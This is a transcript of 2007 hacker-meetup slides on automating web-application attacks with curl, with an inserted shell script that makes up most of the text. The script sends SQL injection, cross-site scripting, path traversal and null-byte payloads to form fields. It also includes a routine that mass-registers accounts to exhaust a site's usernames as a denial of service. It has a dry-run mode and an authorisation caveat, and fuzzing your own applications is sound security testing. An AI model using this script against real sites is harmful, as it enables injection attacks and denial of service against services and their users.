
Automating Exploits for Web Applications






Presentation Transcript


  1. Automating Exploits for Web Applications
     • Ft Smith 2600
     • August 2007

  2. Web Apps
     • Examples
       • Forums
       • Google Maps
       • just about anything "Web 2.0"

  3. Web Apps
     • most apps need information from you
     • Example
       • address for directions
       • an email address
       • registration info for a purchase

  4. Tools
     • *nix
       • Curl http://curl.haxx.se/
       • Libcurl http://curl.haxx.se/libcurl/
       • lynx -dump (wherever you get lynx)
     • Windows
       • Curl
     • Really Bored
       • don't automate. do it by hand

  5. Web Apps
     • This is an example of an application that accepts input from a user

  6. Web Apps
     • What is normally sent using curlip.sh

  7. Web Apps
     • What could be sent using a malicious script

  8. Why bother?
     • Fuzzing
       • testing parameters with seemingly valid data until it breaks
     • Denial of Service
       • take up all available usernames on a website
     • Code injection
       • see what, if any, code is deemed valid
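Slides 4 to 8 describe the whole technique: drive the form with curl instead of a browser, then vary what is sent. The script below is an added example written for this transcript; it is not the talk's curlip.sh and nothing in it is from the original deck. The target URLs (http://example.test/...), the field names, the payload list and the assumption that a registration succeeds with HTTP 200 are all assumptions. Every request goes through one function that reports "status:bytes", so a change in either value against the benign baseline is the "until it breaks" signal from slide 8. DRY_RUN=1 prints each would-be request to stderr without sending anything, which is how to review the traffic before pointing it at an application you are authorised to test.

```shell
#!/bin/sh
# Added example (not the talk's curlip.sh). Assumed: the URLs, field names,
# payloads and "HTTP 200 means accepted". Only run against hosts you may test.

# Send one POST and print "<http_code>:<body_bytes>". Remaining arguments are
# name=value pairs, each passed through --data-urlencode so quotes, '<' and
# '%' reach the application literally. DRY_RUN=1 writes the request to stderr
# and returns a placeholder instead of calling curl.
send_one() {
    url=$1; shift
    if [ "${DRY_RUN:-0}" = 1 ]; then
        printf 'DRY POST %s %s\n' "$url" "$*" >&2
        printf '000:0\n'
        return 0
    fi
    # Rewrite "a=b c=d" into "--data-urlencode a=b --data-urlencode c=d".
    for kv in "$@"; do set -- "$@" --data-urlencode "$kv"; shift; done
    curl -s -o /dev/null -w '%{http_code}:%{size_download}\n' "$@" "$url"
}

# Constructed payload list: a benign baseline first, then length and
# injection probes (slide 8: "see what, if any, code is deemed valid").
payloads() {
    printf '%s\n' \
        'alice' \
        "$(head -c 256 /dev/zero | tr '\000' 'A')" \
        "' OR '1'='1" \
        '<script>alert(1)</script>' \
        '../../../etc/passwd' \
        '%00'
}

# Fuzz one field: the first payload's status:bytes is the baseline, every
# later response that differs is tagged DIFF for a human to look at.
fuzz_param() {
    url=$1; field=$2
    baseline=
    payloads | while IFS= read -r p; do
        r=$(send_one "$url" "$field=$p")
        if [ -z "$baseline" ]; then baseline=$r; fi
        if [ "$r" = "$baseline" ]; then tag=same; else tag=DIFF; fi
        printf '%s\t%s\t%s\n' "$tag" "$r" "$p"
    done
}

# Username exhaustion (slide 8's denial of service): register user1..userN.
# The extra fields and the "200 = accepted" rule are assumptions; a real
# form may redirect (302) on success, so adjust the check for the target.
claim_usernames() {
    url=$1; n=$2; i=1; ok=0
    while [ "$i" -le "$n" ]; do
        code=$(send_one "$url" "username=user$i" \
                   "email=user$i@example.test" "password=pw-$i" | cut -d: -f1)
        if [ "$code" = 200 ]; then ok=$((ok + 1)); fi
        i=$((i + 1))
    done
    printf 'attempted=%s accepted=%s\n' "$n" "$ok"
}

# Usage: sh webfuzz.sh fuzz URL FIELD      (e.g. fuzz http://example.test/search q)
#        sh webfuzz.sh claim URL COUNT     (e.g. claim http://example.test/register 50)
case ${1:-} in
    fuzz)  fuzz_param "$2" "$3" ;;
    claim) claim_usernames "$2" "$3" ;;
esac
```

The baseline comparison is deliberately crude: a real application will vary body size with session tokens or timestamps, so in practice you compare status codes first and only then look at size deltas, exactly the "seemingly valid data until it breaks" loop the slide describes.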

  9. Other sort of related materials
     • curlip.tgz
       • utility I wrote when learning about curl
       • posts your external IP address to http://shyft.us/ip.php
       • sort of a poor man's dyndns
     • whatsmyip.pl
       • utility for Windows to retrieve your external IP, written in Perl
       • again by me
     • either of these could easily be used to pull down every forum post or post arbitrary data to a server
